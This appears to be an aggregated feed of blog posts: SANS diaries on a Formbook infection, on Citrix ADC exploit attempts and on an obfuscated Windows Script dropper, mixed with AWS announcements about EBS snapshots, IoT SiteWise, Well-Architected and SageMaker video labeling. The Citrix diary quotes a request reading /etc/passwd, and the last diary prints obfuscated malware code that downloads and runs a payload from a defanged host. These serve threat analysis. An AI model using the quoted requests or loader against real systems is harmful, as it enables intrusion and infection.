Excel spreadsheet macro kicks off Formbook infection, (Fri, Jul 10th)

Introduction

Formbook has been around for years.  According to FireEye, Formbook has been “…advertised in various hacking forums since early 2016.”  My previous diary about Formbook was back in November 2019, and not much has changed since then.  It still bears documenting, though, if only to show this malware is still active and remains part of our threat landscape.

Today’s diary covers a Formbook infection from Thursday, July 9th 2020.


Shown above:  Flow chart for the Formbook infection covered in today’s diary.

The lure

The lure for this particular infection was a malicious Excel spreadsheet.  Searching through VirusTotal, I found a malware sample that I tested in my lab.  The submission name was /tmp/eml_attach_for_scan/2433e76542036ab53b138a98eeda548a.file, so I don’t know what the original file name was.


Shown above: Malicious Excel spreadsheet I found in VirusTotal.


Shown above: The malicious spreadsheet opened on a vulnerable Windows 10 host, ready for me to enable macros.

Initial infection

The initial infection happened immediately after I enabled macros, when my lab host retrieved a Windows executable (EXE) for Formbook from hxxp://sagc[.]be/svc.exe and executed the file.  See the images below for details.


Shown above:  My lab host retrieving the Formbook EXE from sagc[.]be after enabling macros.


Shown above: Initial location where the Formbook EXE was saved to my lab host.


Shown above:  Formbook EXE’s final location on my infected lab host with a Windows registry update to keep it persistent.
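
The registry update is typical Formbook persistence: an autorun entry pointing at the relocated EXE, with randomly generated names. As a quick triage step, a standard-library Python sketch along these lines (purely illustrative, Windows-only) dumps the usual Run-key entries on a suspect host:

import winreg

# Common autorun locations worth checking; Formbook's value name is random
RUN_KEYS = [
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software\Microsoft\Windows\CurrentVersion\Run"),
]

for hive, path in RUN_KEYS:
    try:
        with winreg.OpenKey(hive, path) as key:
            i = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                    print(f"{path}: {name} = {value}")
                    i += 1
                except OSError:
                    break  # no more values under this key
    except OSError:
        pass  # key missing or not readable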

Data exfiltration

Post-infection traffic was sent to several different domains using the URL patterns shown in the next image.


Shown above: Traffic from an infection filtered in Wireshark.
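
Since every post-infection URL in this traffic used the same /ns424/ directory, a Wireshark display filter along the lines of http.request.uri contains "/ns424/" (illustrative, not from the original capture notes) quickly isolates the Formbook C2 requests.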

Data stolen by Formbook included a screenshot of my infected lab host, along with keystroke logs, application passwords, sensitive data from the browser cache, and information contained in the clipboard.  This data is temporarily stored in a randomly named folder under the infected user’s AppData\Roaming directory.  These artifacts are deleted after the data is exfiltrated through Formbook command and control (C2) traffic.


Shown above: Stolen data from the infected Windows host, waiting for Formbook to exfiltrate it over C2 traffic.

Indicators of Compromise (IoCs)

SHA256 hash: 148a026124126abf74c390c69fbd0bcebce06b600c6a35630cdce29a85a765fc

  • File size: 94,829 bytes
  • File name: unknown
  • File type: Microsoft Excel 2007+
  • File description: Excel spreadsheet with macro for Formbook malware

SHA256 hash: 9ebc903ca6847352aaac87d7f904fe4009c4b7b7acc9b629e5610c0f04dac4ef

  • File size: 481,792 bytes
  • File location: hxxp://sagc[.]be/svc.exe
  • File location: C:\Users\[username]\AppData\Local\Temp\putty.exe
  • File location: C:\Program Files (x86)\Bwlsuser\wzqlrdw.exe
  • File description: Windows executable (EXE) file for Formbook malware

Traffic from an infected Windows host:

Excel macro retrieves Formbook EXE:

  • 92.48.206[.]34 port 80 – sagc[.]be – GET /svc.exe

Formbook post-infection traffic:

  • 157.7.107[.]81 port 80 – www.lovelydays[.]info – GET /ns424/?[long string]
  • 23.235.199[.]50 port 80 – www.rightwebmarketing[.]com – GET /ns424/?[long string]
  • 23.235.199[.]50 port 80 – www.rightwebmarketing[.]com – POST /ns424/
  • 63.250.34[.]167 port 80 – www.mansiobok2[.]info – GET /ns424/?[long string]
  • 63.250.34[.]167 port 80 – www.mansiobok2[.]info – POST /ns424/
  • 34.102.136[.]180 port 80 – www.confidentbeauty[.]tips – GET /ns424/?[long string]
  • 34.102.136[.]180 port 80 – www.confidentbeauty[.]tips – POST /ns424/
  • 198.54.117[.]217 port 80 – www.donateoneeight[.]net – GET /ns424/?[long string]
  • 198.54.117[.]217 port 80 – www.donateoneeight[.]net – POST /ns424/

Unresolved DNS queries from the infected Windows host caused by Formbook:

  • DNS query for www.bakingandcookingandmore[.]com – response: No such name
  • DNS query for www.systemscan12[.]top – response: No such name
  • DNS query for www.lux-dl[.]com – response: No such name
  • DNS query for www.duongtinhot24h[.]com – response: No such name
  • DNS query for www.kcsmqd[.]com – response: No such name
  • DNS query for www.pksbarandgrill[.]net – response: No such name
  • DNS query for www.lx-w[.]com – response: No such name
  • DNS query for www.costcocanadaliguor[.]com – response: No such name
  • DNS query for www.autohaker[.]com – response: No such name
  • DNS query for www.e-golden-boy[.]com – response: No such name
  • DNS query for www.angelalevelsup[.]com – response: No such name

Final words

Formbook infections work nearly the same as they did when I wrote my first diary about Formbook in October 2017.  I’m surprised that I still occasionally run across a sample during my day-to-day research.  An up-to-date Windows 10 host with default security settings should prevent these sorts of infections from happening.  I guess it’s still somehow profitable for the criminals behind Formbook to continue developing this malware.  Apparently, there’s no shortage of vulnerable Windows hosts as potential targets.

A pcap of the infection traffic and malware samples for today’s diary can be found here.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Create Snapshots From Any Block Storage Using EBS Direct APIs

I am excited to announce that you can now create Amazon Elastic Block Store (EBS) snapshots from any block storage data, such as on-premises volumes, volumes from another cloud provider, existing block data stored on Amazon Simple Storage Service (S3), or even your own laptop 🙂

AWS customers using the cloud for disaster recovery of on-premises infrastructure all have the same question: how can I transfer my on-premises volume data to the cloud efficiently and at low cost? You usually create temporary Amazon Elastic Compute Cloud (EC2) instances, attach Amazon Elastic Block Store (EBS) volumes, transfer the data at block level from on-premises to these new EBS volumes, take a snapshot of every EBS volume created, and tear down the temporary infrastructure. Some of you choose to use CloudEndure to simplify this process. Or maybe you just gave up and did not copy your on-premises volumes to the cloud because of the complexity.

To simplify this, today we are announcing 3 new APIs that are part of EBS direct APIs, a set of APIs we announced at re:Invent 2019. We initially launched read and diff APIs; today we extend them with write capabilities. These 3 new APIs allow you to create Amazon Elastic Block Store (EBS) snapshots from your on-premises volumes, or from any block storage data that you want to be able to store and recover in AWS.

With the addition of write capability in EBS direct APIs, you can now create new snapshots from your on-premises volumes, create incremental snapshots, and delete them. Once a snapshot is created, it has all the benefits of snapshots created from Amazon Elastic Block Store (EBS) volumes. You can copy them, share them between AWS accounts, keep them available for Fast Snapshot Restore, or create EBS volumes from them.

Having Amazon Elastic Block Store (EBS) snapshots created from any volume, without the need to spin up Amazon Elastic Compute Cloud (EC2) instances and EBS volumes, simplifies and lowers the cost of creating and managing your disaster recovery copy in the cloud.

Let’s have a closer look at the API
You first call StartSnapshot to create a new snapshot. When the snapshot is incremental, you pass the ID of the parent snapshot. You can also pass additional tags to apply to the snapshot, or encrypt these snapshots and manage the key, just like usual. If you choose to encrypt snapshots, be sure to check our technical documentation to understand the nuances and options.

Then, for each block of data, you call PutSnapshotBlock. This API has 6 mandatory parameters: snapshot-id, block-index, block-data, block-length, checksum, and checksum-algorithm. The API supports block lengths of 512 KB. You can send your blocks in any order, and in parallel; block-index keeps the order correct.

After you send all the blocks, you call CompleteSnapshot with the changed-blocks-count parameter set to the number of blocks you sent.

Let’s put all these together
Here is the pseudo code you would write to create a snapshot.

// Build the EBS direct APIs client
AmazonEBS amazonEBS = AmazonEBSClientBuilder.standard()
   .withEndpointConfiguration(new AwsClientBuilder.EndpointConfiguration(endpointName, awsRegion))
   .withCredentials(credentialsProvider)
   .build();

// Start the snapshot (pass the parent snapshot ID to make it incremental)
response = amazonEBS.startSnapshot(startSnapshotRequest);
snapshotId = response.getSnapshotId();

// Send each changed block; calls may be issued in parallel,
// block-index keeps the ordering correct
for each (block in changeset) {
    putResponse = amazonEBS.putSnapshotBlock(putSnapshotBlockRequest);
}

// Declare how many blocks were sent to seal the snapshot
amazonEBS.completeSnapshot(completeSnapshotRequest);
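
To make this concrete outside of pseudo code, here is a minimal Python (boto3) sketch of the same three calls. It is an illustration only: the source path is hypothetical, and a real tool would parallelize the PutSnapshotBlock calls:

import base64
import hashlib

import boto3

ebs = boto3.client("ebs")
BLOCK_SIZE = 512 * 1024  # the API works in 512 KB blocks

# Start the snapshot; VolumeSize is in GiB, and passing
# ParentSnapshotId=... here would make it incremental
snap = ebs.start_snapshot(VolumeSize=1, Description="from on-premises volume")
snapshot_id = snap["SnapshotId"]

blocks_sent = 0
with open("/dev/sdx", "rb") as volume:  # hypothetical source device or image file
    index = 0
    while True:
        data = volume.read(BLOCK_SIZE)
        if not data:
            break
        data = data.ljust(BLOCK_SIZE, b"\x00")  # pad a short final block
        checksum = base64.b64encode(hashlib.sha256(data).digest()).decode()
        ebs.put_snapshot_block(
            SnapshotId=snapshot_id,
            BlockIndex=index,
            BlockData=data,
            DataLength=BLOCK_SIZE,
            Checksum=checksum,
            ChecksumAlgorithm="SHA256",
        )
        blocks_sent += 1
        index += 1

# Declare how many blocks were sent to seal the snapshot
ebs.complete_snapshot(SnapshotId=snapshot_id, ChangedBlocksCount=blocks_sent)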

As usual, when using this code, you must have appropriate IAM policies allowing calls to the new APIs. For example:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": [
      "ebs:StartSnapshot",
      "ebs:PutSnapshotBlock",
      "ebs:CompleteSnapshot"
    ],
    "Resource": "arn:aws:ec2:<Region>::snapshot/*"
  }]
}

Also include KMS-related permissions when creating encrypted snapshots.

In addition to the storage cost for snapshots, there is a charge per API call when you call PutSnapshotBlock.

These new snapshot APIs are available in the following AWS Regions: US East (Ohio), US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Hong Kong), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), China (Beijing), China (Ningxia), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), Europe (Stockholm), Middle East (Bahrain), and South America (São Paulo).

You can start to use them today.

— seb

AWS IoT SiteWise – Now Generally Available

At AWS re:Invent 2018, we announced AWS IoT SiteWise in preview, a fully managed AWS IoT service that you can use to collect, organize, and analyze data from industrial equipment at scale.

Getting performance metrics from industrial equipment is challenging because data is often locked into proprietary on-premises data stores and typically requires specialized expertise to retrieve and place in a format that is useful for analysis. AWS IoT SiteWise simplifies this process by providing software running on a gateway that resides in your facilities and automates the process of collecting and organizing industrial equipment data.

With AWS IoT SiteWise, you can easily monitor equipment across your industrial facilities to identify waste, such as breakdown of equipment and processes, production inefficiencies, and defects in products.

Last year at AWS re:Invent 2019, several new features were launched, including SiteWise Monitor. Today, I am excited to announce that AWS IoT SiteWise is now generally available in US East (N. Virginia), Europe (Ireland), Europe (Frankfurt), and US West (Oregon). Let’s see how AWS IoT SiteWise works!

AWS IoT SiteWise – Getting Started
You can easily explore AWS IoT SiteWise by creating a demo wind farm with a single click in the AWS IoT SiteWise console. The demo deploys an AWS CloudFormation template to create assets and generates sample data for up to a week under the AWS Free Tier.

You can find the SiteWise demo in the upper-right corner of the AWS IoT SiteWise console; choose Create demo. The demo takes around 3 minutes to create demo models and assets representing a wind farm.

Once you see the created assets in the console, you can create virtual representations of your industrial operations with AWS IoT SiteWise assets. An asset can represent a device, a piece of equipment, or a process that uploads one or more data streams to the AWS Cloud. For example, a wind turbine might send air temperature, propeller rotation speed, and power output as time-series measurements to asset properties in AWS IoT SiteWise.

Also, you can securely collect data from the plant floor (sensors, equipment, or a local on-premises gateway) and upload it to the AWS Cloud using gateway software called AWS IoT SiteWise Connector. It runs on common industrial gateway devices running AWS IoT Greengrass, and reads data directly from servers and historians over the OPC Unified Architecture protocol. AWS IoT SiteWise also accepts MQTT data through AWS IoT Core, and direct ingestion via its REST API.
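
For the direct ingestion path, the relevant operation is BatchPutAssetPropertyValue. Here is a minimal Python (boto3) sketch; the property alias is hypothetical and must match one defined on your own assets:

import time

import boto3

sitewise = boto3.client("iotsitewise")

# Send a single temperature reading, addressed by property alias
# (the alias below is made up for illustration)
sitewise.batch_put_asset_property_value(
    entries=[{
        "entryId": "reading-1",
        "propertyAlias": "/windfarm/turbine7/temperature",
        "propertyValues": [{
            "value": {"doubleValue": 26.3},
            "timestamp": {"timeInSeconds": int(time.time())},
            "quality": "GOOD",
        }],
    }]
)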

You can learn how to collect data using AWS IoT SiteWise Connector in the blog series – Part 1 of AWS IoT Blog and in the service documentation.

SiteWise Monitor – Creating Managed Web Applications
Once data is stored in AWS IoT SiteWise, you can stream live data in near real time and query historical data to build downstream IoT applications, but we also provide a no-code alternative with SiteWise Monitor. You can explore your library of assets, and create and share operational dashboards with plant operators for real-time monitoring and visualization of equipment health and output.

In the SiteWise Monitor console, choose Create portal to create a web application that is accessible from a web browser on any web-enabled desktop, tablet, or phone; users sign in with their corporate credentials through the AWS Single Sign-On (SSO) experience.

Administrators can create one or more web applications to easily share access to asset data with any team in your organization to accelerate insights.

If you click a given portal link and sign in via your AWS SSO credentials, you can visualize and monitor your device, process, and equipment data to quickly identify issues and improve operational efficiency with SiteWise Monitor.

You can create a dashboard in a new project for your team so they can visualize and understand your project data. Choose a visualization type that best displays your data, and rearrange and resize visualizations to create a layout that fits your team’s needs.

The dashboard shows asset data and computed metrics in near real time, or you can compare and analyze historical time-series data from multiple assets and different time periods. There is a new dashboard feature where you can specify thresholds on the charts and have the charts change color when those thresholds are exceeded.

Also, you can learn how to monitor key measurements and metrics of your assets in near real time using SiteWise Monitor in the blog series – Part 2 of the AWS IoT Blog.

Furthermore, you can subscribe to AWS IoT SiteWise modeled data via the AWS IoT Core rules engine, enable condition monitoring and send notifications or alerts using AWS IoT Events in near real time, and enable Business Intelligence (BI) reporting on historical data using Amazon QuickSight. For more detail, please refer to the hands-on guide in the blog series – Part 3 of the AWS IoT Blog.

Now Available!
With AWS IoT SiteWise, you only pay for what you use with no minimum fees or mandatory service usage. You are billed separately for usage of messaging, data storage, data processing, and SiteWise Monitor. This approach provides you with billing transparency because you only pay for the specific AWS IoT SiteWise resources you use. Please visit the pricing page to learn more and estimate your monthly bill using the AWS IoT SiteWise Calculator.

You can watch interesting talks about business cases and solutions in ‘Driving Overall Equipment Effectiveness (OEE) Across Your Industrial Facilities’ and ‘Building an End-to-End Industrial IoT (IIoT) Solution with AWS IoT’. To learn more, please visit the AWS IoT SiteWise website or the tutorial and developer guide.

Explore AWS IoT SiteWise with Bill Vass and Cherie Wong!

Please send us feedback either in the forum for AWS IoT SiteWise or through your usual AWS support contacts.

Channy;

AWS Well-Architected Framework – Updated White Papers, Tools, and Best Practices

We want to make sure that you are designing and building AWS-powered applications in the best possible way. Back in 2015 we launched AWS Well-Architected to make sure that you have all of the information that you need to do this right. The framework is built on five pillars:

Operational Excellence – The ability to run and monitor systems to deliver business value and to continually improve supporting processes and procedures.

Security – The ability to protect information, systems, and assets while delivering business value through risk assessments and mitigation strategies.

Reliability – The ability of a system to recover from infrastructure or service disruptions, dynamically acquire computing resources to meet demand, and mitigate disruptions such as misconfigurations or transient network issues.

Performance Efficiency – The ability to use computing resources efficiently to meet system requirements, and to maintain that efficiency as demand changes and technologies evolve.

Cost Optimization – The ability to run systems to deliver business value at the lowest price point.

Whether you are a startup, a unicorn, or an enterprise, the AWS Well-Architected Framework will point you in the right direction and then guide you along the way as you build your cloud applications.

Lots of Updates
Today we are making a host of updates to the Well-Architected Framework! Here’s an overview:

Well-Architected Framework – This update includes new and updated questions, best practices, and improvement plans, plus additional examples and architectural considerations. We have added new best practices in operational excellence (organization), reliability (workload architecture), and cost optimization (practice Cloud Financial Management). We are also making the framework available in eight additional languages (Spanish, French, German, Japanese, Korean, Brazilian Portuguese, Simplified Chinese, and Traditional Chinese). Read the Well-Architected Framework (PDF, Kindle) to learn more.

Pillar White Papers & Labs – We have updated the white papers that define each of the five pillars with additional content, including new & updated questions, real-world examples, additional cross-references, and a focus on actionable best practices. We also updated the labs that accompany each pillar.

Well-Architected Tool – We have updated the AWS Well-Architected Tool to reflect the updates that we made to the Framework and to the White Papers.

Learning More
In addition to the documents that I linked above, you should also watch these videos.

In this video, AWS customer Cox Automotive talks about how they are using AWS Well-Architected to deliver results across over 200 platforms:

In this video, my colleague Rodney Lester tells you how to build better workloads with the Well-Architected Framework and Tool:

Get Started Today
If you are like me, a lot of interesting services and ideas are stashed away in a pile of things that I hope to get to “someday.” Given the importance of the five pillars that I mentioned above, I’d suggest that Well-Architected does not belong in that pile, and that you should do all that you can to learn more and to become well-architected as soon as possible!

Jeff;

New – Label Videos with Amazon SageMaker Ground Truth

Launched at AWS re:Invent 2018, Amazon SageMaker Ground Truth is a capability of Amazon SageMaker that makes it easy to annotate machine learning datasets. Customers can efficiently and accurately label image, text, and 3D point cloud data with built-in workflows, or any other type of data with custom workflows. Data samples are automatically distributed to a workforce (private, 3rd party, or MTurk), and annotations are stored in Amazon Simple Storage Service (S3). Optionally, automated data labeling may also be enabled, reducing both the amount of time required to label the dataset and the associated costs.

As models become more sophisticated, AWS customers are increasingly applying machine learning prediction to video content. Autonomous driving is perhaps the most well-known use case, as safety demands that road conditions and moving objects be correctly detected and tracked in real time. Video prediction is also a popular application in sports, tracking players or racing vehicles to compute all kinds of statistics that fans are so fond of. Healthcare organizations also use video prediction to identify and track anatomical objects in medical videos. Manufacturing companies do the same to track objects on the assembly line, parcels for logistics, and more. The list goes on, and amazing applications keep popping up in many different industries.

Of course, this requires building and labeling video datasets, where objects of interest need to be labeled manually. At 30 frames per second, one minute of video translates to 1,800 individual images, so the amount of work can quickly become overwhelming. In addition, specific tools have to be built to label images, manage workflows, and so on. All this work takes valuable time and resources away from an organization’s core business.

AWS customers have asked us for a better solution, and today I’m very happy to announce that Amazon SageMaker Ground Truth now supports video labeling.

Customer use case: the National Football League
The National Football League (NFL) has already put this new feature to work. Says Jennifer Langton, SVP of Player Health and Innovation, NFL: “At the National Football League (NFL), we continue to look for new ways to use machine learning (ML) to help our fans, broadcasters, coaches, and teams benefit from deeper insights. Building these capabilities requires large amounts of accurately labeled training data. Amazon SageMaker Ground Truth was truly a force multiplier in accelerating our project timelines. We leveraged the new video object tracking workflow in addition to other existing computer vision (CV) labeling workflows to develop labels for training a computer vision system that tracks all 22 players as they move on the field during plays. Amazon SageMaker Ground Truth reduced the timeline for developing a high quality labeling dataset by more than 80%”.

Courtesy of the NFL, here are a couple of predicted frames, showing helmet detection in a Seattle Seahawks video. This particular video has 353 frames. This first picture is frame #100.

Object tracking

This second picture is frame #110.

Object tracking

Introducing Video Labeling
With the addition of video task types, customers can now use Amazon SageMaker Ground Truth for:

  • Video clip classification
  • Video multi-frame object detection
  • Video multi-frame object tracking

The multi-frame task types support multiple labels, so that you may label different object classes present in the video frames. You can create labeling jobs to annotate frames from scratch, as well as adjustment jobs to review and fine-tune frames that have already been labeled. These jobs may be distributed either to a private workforce, or to a vendor workforce you pick on AWS Marketplace.

Using the built-in GUI, workers can then easily label and track objects across frames. Once they’ve annotated a frame, they can use an assistive labeling feature to predict the location of bounding boxes in the next frame, as you will see in the demo below. This significantly simplifies labeling work, saves time, and improves the quality of annotations. Last but not least, work is saved automatically.

Preparing Input Data for Video Object Detection and Tracking
As you would expect, input data must be located in S3. You may bring either video files, or sequences of video frames.

The first option is the simplest, as Amazon SageMaker Ground Truth includes a tool that automatically extracts frames from your video files.  Optionally, you can sample frames (1 in ‘n’) in order to reduce the amount of labeling work. The extraction tool also builds a manifest file describing sequences and frames. You can learn more about it in the documentation.

The second option requires two steps: extracting frames, and building the manifest file. Extracting frames can easily be performed with the popular ffmpeg open source tool. Here’s how you could convert the first 60 seconds of a video to a frame sequence:

$ ffmpeg -ss 00:00:00.00 -t 00:01:00.00 -i basketball.mp4 frame%04d.jpg

Each frame sequence should be uploaded to S3 under a different prefix, for example s3://my-bucket/my-videos/sequence1, s3://my-bucket/my-videos/sequence2, and so on, as explained in the documentation.

Once you have uploaded your frame sequences, you may then either bring your own JSON files to describe them, or let Ground Truth crawl your sequences and build the JSON files and the manifest file for you automatically. Please note that a video sequence cannot be longer than 2,000 frames, which corresponds to about a minute of video at 30 frames per second.

Each sequence should be described by a simple sequence file:

  • A sequence number, an S3 prefix, and a number of frames.
  • A list of frames: number, file name, and creation timestamp.

Here’s an example of a sequence file.

{"version": "2020-06-01",
"seq-no": 1, "prefix": "s3://jsimon-smgt/videos/basketball", "number-of-frames": 1800, 
	"frames": [
		{"frame-no": 1, "frame": "frame0001.jpg", "unix-timestamp": 1594111541.71155},
		{"frame-no": 2, "frame": "frame0002.jpg", "unix-timestamp": 1594111541.711552},
		{"frame-no": 3, "frame": "frame0003.jpg", "unix-timestamp": 1594111541.711553},
		{"frame-no": 4, "frame": "frame0004.jpg", "unix-timestamp": 1594111541.711555},
. . .
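
If you build sequence files yourself, a small script can generate them from a directory of extracted frames. Here is a throwaway Python sketch (the prefix is illustrative, the timestamps are synthetic, and it assumes frames named by the ffmpeg command above):

import json
import os
import time

FRAME_DIR = "frames"                           # local directory of extracted frames
PREFIX = "s3://my-bucket/my-videos/sequence1"  # illustrative S3 prefix

frames = sorted(f for f in os.listdir(FRAME_DIR) if f.endswith(".jpg"))
sequence = {
    "version": "2020-06-01",
    "seq-no": 1,
    "prefix": PREFIX,
    "number-of-frames": len(frames),
    "frames": [
        {"frame-no": i, "frame": name, "unix-timestamp": time.time()}
        for i, name in enumerate(frames, start=1)
    ],
}

with open("seq1.json", "w") as f:
    json.dump(sequence, f)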

Finally, the manifest file should point at the sequence files you’d like to include in the labeling job. Here’s an example.

{"source-ref": "s3://jsimon-smgt/videos/seq1.json"}
{"source-ref": "s3://jsimon-smgt/videos/seq2.json"}
. . .

Just like for other task types, the augmented manifest is available in S3 once labeling is complete. It contains annotations and labels, which you can then feed to your machine learning training job.

Labeling Videos with Amazon SageMaker Ground Truth
Here’s a sample video where I label the first ten frames of a sequence. You can see a screenshot below.

I first use the Ground Truth GUI to carefully label the first frame, drawing bounding boxes for basketballs and basketball players. Then, I use the “Predict next” assistive labeling tool to predict the location of the boxes in the next nine frames, applying only minor adjustments to some boxes. Although this was my first try, I found the process easy and intuitive. With a little practice, I could certainly go much faster!

Getting Started
Now, it’s your turn. You can start labeling videos with Amazon SageMaker Ground Truth today in the following regions:

  • US East (N. Virginia), US East (Ohio), US West (Oregon),
  • Canada (Central),
  • Europe (Ireland), Europe (London), Europe (Frankfurt),
  • Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Seoul), Asia Pacific (Sydney), Asia Pacific (Tokyo).

We’re looking forward to reading your feedback. You can send it through your usual support contacts, or in the AWS Forum for Amazon SageMaker.

– Julien

Active Exploit Attempts Targeting Recent Citrix ADC Vulnerabilities CTX276688, (Thu, Jul 9th)

I just can’t get away from vulnerabilities in perimeter security devices. In the last couple of days, I spent a lot of time with our F5 BIG-IP honeypot. But it looks like I have to revive the Citrix honeypot again. As of today, my F5 honeypot is getting hit by attempts to exploit two of the Citrix vulnerabilities disclosed this week [1]. Details with proof-of-concept code snippets were released yesterday [2].

It is not clear exactly which CVE was assigned to which vulnerability, but the possible candidates are CVE-2020-8195 and CVE-2020-8196.

The first issue, probably the more severe one, allows arbitrary file downloads. I currently see this issue exploited from just one IP address: 13.232.154.46 (Amazon… my honeypot must have Amazon Prime to get exploits the next day).

POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 

The second vulnerability (which I don’t think has a CVE assigned to it, but I will update this diary if I find one) allows retrieval of a PCI-DSS report without authentication. Actually… you still need to “authenticate,” I guess, by adding “sig_name=_default_signature_” to the URL :/

The full request I see being used (just the Apache log entry):

POST /pcidss/report?username=nsroot&set=1&type=allprofiles&sid=loginchallengeresponse1requestbody HTTP/1.1" 404 211 "-" "python-requests/2.19.1"
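
If you want to check your own Apache logs for these probes, a trivial Python sketch like the following (the log path will vary per setup) flags both request patterns:

import re

# Matches the file-download and PCI-DSS report probes described above
probe = re.compile(r"/(rapi/filedownload|pcidss/report)")

with open("/var/log/apache2/access.log") as log:
    for line in log:
        if probe.search(line):
            print(line.rstrip())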

Interestingly, so far most of the IPs scanning for this vulnerability belong to “hostwindsdns.com”.

Current IPs:

23.254.164.181
23.254.164.48
43.245.160.163
104.168.166.234
104.168.194.148
142.11.213.254
142.11.227.204
192.119.73.107
192.119.73.108
192.236.162.232
192.236.163.117
192.236.163.119
192.236.192.119
192.236.192.3
192.236.192.5
192.236.192.6

The vulnerability isn’t all that “bad” (I have to check whether the report leaks anything specific); it does not allow access to anything else. But it could very well be used to identify unpatched devices. Some of the other vulnerabilities patched with this update are “interesting”, but more tricky to exploit.

[1] https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
[2] https://dmaasland.github.io/posts/citrix.html


Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

If You Want Something Done Right, You Have To Do It Yourself… Malware Too!, (Wed, Jul 8th)

I’m teaching FOR610[1] this week, and today is dedicated to malicious web and document files. That’s a good opportunity to share with you a Windows Script that uses a nice obfuscation technique. The attacker’s idea is to use a big array containing the second-stage payload and interesting strings:

var Kerosene = [
function(){
var Odds = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC…";
return [function(){
eval("Odds = Odds.replace(new RegExp(\"!@@\", \"g\"), \"A\");");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B");
eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x21\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x6D\x22\x29\x3B");
return Odds;
}][0]();
},
Array("CreateObject","ReadText","undefined","\x61\x64\x6F\x64\x62\x2E","\x43\x68\x61\x72\x53\x65\x74","\x50\x6F\x73\x69\x74\x69\x6F\x6E","\x54\x79\x70\x65","Open","Write","nodeTypedValue"),null
];

Like JavaScript, Windows Script is a very permissive language regarding data types, and you can mix functions and strings in the same array. The first element of the array Kerosene[] is a function that deobfuscates a very long string that has been polluted with character substitutions. Once these characters are replaced with the right ones, you can decode the Base64 string and get the second-stage payload. The remaining elements are a second array of strings (some of them hex-encoded) and a null entry.
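
To make the substitution order concrete, here is a quick Python sketch of the same deobfuscation, run against a truncated piece of the string above:

import base64

# Truncated sample of the polluted Base64 string from the script above
odds = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC"

# Apply the three substitutions in the same order as the evals:
# "!@@" -> "A", then "m" -> "d", then "!" -> "m"
odds = odds.replace("!@@", "A").replace("m", "d").replace("!", "m")

# The cleaned string is valid Base64; decoding this fragment yields
# the start of the second-stage script: b'var nem44;\r\nvar longText = "UEsDB'
print(base64.b64decode(odds))

Then the following code is executed: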

Kerosene[3] = Array(WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D"),
                    WSH[Kerosene[1][0]]("microsoft.xmldom").createElement("cfg"),
                    {bmx: "\x75\x73\x2D\x61\x73\x63\x69\x69"});
Kerosene[4] = function(){return Kerosene[3][0];};
[function(){
  Kerosene[3][1].dataType = "\x62\x69\x6E\x2E\x62\x61\x73\x65\x36\x34";
  Kerosene[3][1].text = Kerosene[0]();
  [function(){
    eval("Kerosene[4]()[Kerosene[1][6]] = 1;Kerosene[4]()[Kerosene[1][7]]();Kerosene[4]()[Kerosene[1][8]](Kerosene[3][1][Kerosene[1][9]]);");
    eval("Kerosene[4]()[Kerosene[1][5]] = 0;Kerosene[4]()[Kerosene[1][6]] = 2;");
    eval("Kerosene[4]()[Kerosene[1][4]] = Kerosene[3][2].bmx;");
    eval("Kerosene = [Array(eval), Kerosene[4](), [Kerosene[1][1]]];");
  }][0]();
}][0]();

Kerosene[0][0](Kerosene[1][Kerosene[2]]());

How does it work? References to elements of the array are replaced by their values during execution. For example:

WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D")

becomes:

WSH["CreateObject"]("adodb.stream")

The second payload implements the same obfuscation technique (a Base64 payload is decoded after replacing some garbage characters). True to the diary’s title, the script helps itself: the interesting function is GrabJreFromNet(), which tries to download a Java Runtime Environment if one is not already installed on the victim’s computer. The package is grabbed from this URL: hxxp://ops[.]com[.]pa/jre7.zip

The script performs the following test to detect whether Java is available:

var text = "";
try {
  text = wshShell.RegRead("HKLMSOFTWAREWow6432NodeJavaSoftJava Runtime EnvironmentCurrentVersion");
  text = wshShell.RegRead("HKLMSOFTWAREWow6432NodeJavaSoftJava Runtime Environment" + text + "JavaHome");
} catch(err) {}
try {
  if (text == "") {
    text = wshShell.RegRead("HKLMSOFTWAREJavaSoftJava Runtime EnvironmentCurrentVersion");
    text = wshShell.RegRead("HKLMSOFTWAREJavaSoftJava Runtime Environment" + text + "JavaHome");
    if (text != "") {
      text = text + "binjavaw.exe";
    }
  }
  else {
    text = text + "binjavaw.exe";
  }
} catch(err) {}
try {
  if (text != "") {
    //wshShell.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionRunntfsmgr", """ + text + "" -jar "" + stubpath + """, "REG_SZ");
    wshShell.run (""" + text + "" -jar "" + stubpath + """);
  } else {
    GrabJreFromNet();
  }
} catch(err) {}

